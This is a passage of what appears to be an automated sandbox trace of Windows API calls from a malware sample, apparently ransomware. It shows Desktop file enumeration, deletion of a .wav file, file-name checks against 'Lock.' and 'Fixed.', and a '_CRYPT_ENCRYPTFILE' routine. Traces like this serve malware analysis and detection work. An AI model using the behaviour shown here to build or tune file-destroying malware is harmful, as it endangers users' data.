(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0129.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0129.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0129.917] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0129.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0129.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0129.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0129.917] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0129.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0129.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0129.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0129.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0129.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0129.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0129.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0129.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e563a8 [0129.918] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-U62pFYLePGc.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\-U62pFYLePGc.wav", lpFilePart=0x8cedf4*="-U62pFYLePGc.wav") returned 0x28 [0129.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0129.918] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-U62pFYLePGc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\-u62pfylepgc.wav")) returned 0x20 [0129.919] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\-U62pFYLePGc.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1621d280, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x64b42e20, ftLastAccessTime.dwHighDateTime=0x1d5ecc5, ftLastWriteTime.dwLowDateTime=0x64b42e20, ftLastWriteTime.dwHighDateTime=0x1d5ecc5, nFileSizeHigh=0x0, nFileSizeLow=0xa916, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="-U62pFYLePGc.wav", cAlternateFileName="-U62PF~1.WAV")) returned 0xa87490 [0129.919] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-U62pFYLePGc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\-u62pfylepgc.wav")) returned 1 [0129.921] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1621d280, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x64b42e20, ftLastAccessTime.dwHighDateTime=0x1d5ecc5, ftLastWriteTime.dwLowDateTime=0x64b42e20, ftLastWriteTime.dwHighDateTime=0x1d5ecc5, nFileSizeHigh=0x0, nFileSizeLow=0xa916, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="-U62pFYLePGc.wav", cAlternateFileName="-U62PF~1.WAV")) returned 0 [0129.921] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0129.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0129.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0129.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0129.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0129.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0129.921] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0129.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0129.922] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0129.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0129.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0129.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0129.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0129.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0129.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0129.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0129.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0129.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e563a8 [0129.923] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-U62pFYLePGc.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\-U62pFYLePGc.wav", lpFilePart=0x8cf650*="-U62pFYLePGc.wav") returned 0x28 [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0129.923] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-U62pFYLePGc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\-u62pfylepgc.wav")) returned 0xffffffff [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0129.923] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0129.923] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0129.923] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0129.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0129.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0129.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0129.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0129.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0129.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0129.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0129.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0129.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0129.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0129.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0129.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0129.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2a44Hi4EE Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a44Hi4EE Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="44Hi4EE Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Hi4EE Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hi4EE Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i4EE Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4EE Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EE Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lmnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mnc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nc.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0129.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0129.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0129.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0129.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0129.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0129.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0129.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0129.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0129.925] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0129.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0129.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0129.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0129.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0129.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0129.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x9778d8 [0129.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2a44Hi4EE Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a44Hi4EE Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="44Hi4EE Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Hi4EE Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hi4EE Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i4EE Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4EE Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EE Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lmnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mnc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0129.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nc.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0129.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0129.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0129.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0129.927] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0129.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0129.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0129.927] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0129.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0129.928] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0129.928] 